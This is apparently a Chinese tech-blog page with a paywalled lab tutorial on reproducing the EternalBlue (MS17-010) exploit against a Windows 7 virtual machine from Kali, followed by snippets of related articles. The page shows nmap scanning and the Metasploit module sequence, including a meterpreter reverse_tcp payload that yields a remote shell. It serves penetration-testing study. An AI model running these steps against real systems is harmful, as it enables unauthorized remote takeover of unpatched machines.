永恒之蓝(ms17-010)漏洞复现,进行简单后渗透信息收集

最新推荐文章于 2025-09-25 22:03:27 发布
原创 最新推荐文章于 2025-09-25 22:03:27 发布 · 4.1k 阅读 · 51 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细介绍如何利用MS17-010(永恒之蓝)漏洞进行攻击演练,包括环境配置、漏洞扫描、攻击模块使用及后渗透信息收集等关键步骤。

申明
本文章仅供学习使用

环境准备:
win7虚拟机(靶机)
ip:192.168.56.134

kali虚拟机(攻击机)
ip:172.18.20.164

要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁

实验开始:
先用nmap扫描一下靶机开了哪几个端口:

nmap -Sv -p 1-1000 192.168.56.134

在这里插入图片描述
跑了两分钟,发现win7着实开了445端口。接下来直接打开msfconsole来进行攻击。
打开msfconsole会随机跳出图案,每一次打开都不一样
打开msfconsole会随机跳出图案,每一次打开都不一样。
接下来使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击即可。

如果忘了模块名问题也不大,直接搜索漏洞名字ms17-010即可:

search ms17-010

在这里插入图片描述
根据后面的等级(rank)来进行选择即可。这里使用exploit/windows/smb/ms17_010_eternalblue模块哈,命令如下:

u
最低0.47元/天 解锁文章
永恒之蓝漏洞复现(ms17-010)
渗透之路,攻防之间皆学问
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝 MS17-010 漏洞复现
Nobug_的博客
06-16 1104
永恒之蓝 MS17-010 漏洞复现 文章目录永恒之蓝 MS17-010 漏洞复现前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.
ms_17_010漏洞利用
qq_46635165的博客
04-29 1106
ms17_010漏洞利用复现 ms17_010漏洞原理 能力有限,请参见大佬的blog:https://blog.youkuaiyun.com/luoshenwei3533/article/details/82931999 环境准备 kali 作为攻击方 IP 10.1.1.1 win2003 作为受害方 IP 10.1.1.2 漏洞利用条件 win2003 开启了445端口(默认是开启的),未打漏洞补丁 win2003 关闭防火墙 二者能够相互ping通 简单信息收集 1)假设攻击方目前不知道目标主机的端口,
MSF复现 ms17_010永恒之蓝
beichenyyds的博客
03-01 2685
Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。 MSF的更新 apt update apt install metasploit-
ms17-010永恒之蓝漏洞复现
最新发布
Filotimo_的博客
09-25 6277
ms17-010利用的端口是445端口。
MS17-010永恒之蓝1.0)漏洞远程控制win7系统操作实战小白通俗易懂
qq_51627054的博客
02-06 957
6.根据刚刚查询的信息设置所需参数参数 ,现在是已经进入使用这个漏洞,required提示yes的地方需要设置对应参数。8.至此结束,写的不算是太详细,但是流程跟我上一篇类似,可以作为参考。1.准备环境win7操作系统(被攻击机)以及kali系统(攻击机),kali使用。2.打开kali终端,进入msf,输入msfconsole然后等待启动。5.查信息,使用info命令查看相关信息,查看如何使用这个脚本。4.搜索到这个漏洞,使用use命令,使用这个漏洞。3.搜索漏洞远程攻击MS17-010漏洞
ms17-010 php版本,PHP版ms17-010
weixin_39527879的博客
03-12 130
//根据巡风python代码翻译成PHP代码//2017.08.03 by ice && By T00ls.Net;@error_reporting(7);if(@$_GET['host']){$host=trim($_GET['host']);if(ms17010($host,445)){echo '[+] Vulnerability!';}else{echo '[-] No V...
MS17-010永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现
weixin_42474227的博客
12-30 9926
永恒之蓝 MS17-010漏洞复现 学好网络安全,保护自己,保护家人
复现永恒之蓝ms17-010漏洞笔记
x202231的博客
11-01 967
渗透电脑的路上有很多人不知道该怎么做不知道到底对不对,那么本章就介绍利用永恒之蓝漏洞渗透一台win7的电脑。这个漏洞算是比较常见的漏洞也是非常的好用具体后面的可以参考其他的博客文章。
通过Metasploit实现MS17-010永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1537
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
MS17-010 补丁
05-15
安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 有关此更新的更多信息,请参阅 Microsoft 知识库文章 4013389。
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
MS17_010 漏洞利用与安全加固
Tystem
03-18 3042
MS17_010 漏洞后门利用程序 EternalBlue(从目前使用情况来看,相对比较稳定)可影响 Windows 7和 Windows Server 2008 大部分版本的操作系统,无需认证权限就能实现系统入侵控制;插件工具DoublePulsar 可以远程向目标控制系统注入恶意DLL 或 Payload程序。综合利用这两个工具,入侵成功之后可以对目标系统执行 Empire/Meterpreter 反弹连接控制。在此过程,还需要NSA 使用的类似 Metasploit 的漏洞利用代码攻击框架 FuzzB
实战--MS17_010渗透内网主机
小英雄颂人头
02-28 1385
0xx1 环境搭建 目标主机 Win7电脑,包括三个用户,其中,两个Administrator组,一个User组,IP地址-- 10.238.207.38,用户jhon,001为管理员权限,002为用户权限,其他用户已禁用 渗透系统 Kali linux x64系统 Metasploit框架 实战环境 VMw...
MS17_010利用总结
qq_43766053的博客
10-25 3534
MS17_010利用总结 一、 什么是MS17_010 MS17_010也就是我们常说的永恒之蓝漏洞,爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 漏洞出现在Windows SMB
ms17-010 永恒之蓝
qq_62803993的博客
01-12 5808
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
kali初讲——Metasploit攻击ms17_010复现
萌蠢骇客
06-14 2283
Kali初讲——ms17_010漏洞永恒之蓝复现
渗透测试--MS17-010永恒之蓝漏洞
jxy158212的博客
08-08 1837
nmap是目前最流行的网络扫描工具,不仅能准确探测单台主机的详细情况,而且能高效地对大范围的Ip地址段扫描。能扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至知道网络中使用了何种类型的防火墙设备等。常见指令-sT:TCP connect扫描-sF/-sX/-sN:通过发送一些特殊的标志位以避开设备或软件的检测-sP:通过发送ICMP echo请求探测主机是否存活,原理同Ping-sU:探测目标主机开放了哪些UDP端口-sA:TCP ACK扫描,对防火墙上未屏蔽的端口进行探测。
kali)永恒之蓝(ms17-010)漏洞实验靶机如何下载
06-25
在进行永恒之蓝MS17-010漏洞实验时,选择合适的靶机镜像至关重要。该实验通常基于Windows系统,因为永恒之蓝漏洞主要影响的是Windows SMB服务。以下是一些推荐的靶机镜像资源和获取方式: ### 靶机镜像推荐 1. **Windows 7 SP1 x64/x86** Windows 7 SP1 是永恒之蓝漏洞复现中最常用的系统版本之一,因为它未默认安装补丁,且广泛存在于当时的环境中。可以在一些虚拟化平台或社区分享中找到未经修补的镜像[^1]。 2. **Windows Server 2008 R2 SP1** 另一个常见选择是 Windows Server 2008 R2 SP1,它同样存在该漏洞且适合企业级环境模拟测试。可以从微软官方评估中心下载试用版ISO文件,并通过虚拟机工具创建靶机[^3]。 3. **Metasploitable 2/3** 虽然 Metasploitable 主要用于教学和练习,但其某些版本也包含可被利用的SMB服务配置,适合初学者进行基础练习。可以从 SourceForge 获取 Metasploitable 2 的 VHD 或 OVA 文件[^4]。 4. **自定义靶机** 在 Kali Linux 上使用 `msfconsole` 进行漏洞测试时,也可以自行搭建靶机环境。例如,在 VirtualBox 或 VMware 中安装未打补丁的 Windows 系统,并关闭自动更新功能以确保漏洞依然存在[^3]。 ### 下载与配置建议 - **中科大Kali镜像源** 提供了完整的Kali Linux ISO镜像,适用于搭建攻击机环境。可以访问其镜像站获取最新版本: ``` deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib ``` 安装完成后,可通过 `apt update && apt install metasploit-framework` 安装 Metasploit Framework [^2]。 - 永恒之蓝模块在 Metasploit 中的路径为: ``` use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP> set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <本地监听IP> run ``` 成功利用后将获得 Meterpreter Shell,可用于进一步渗透操作[^4]。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值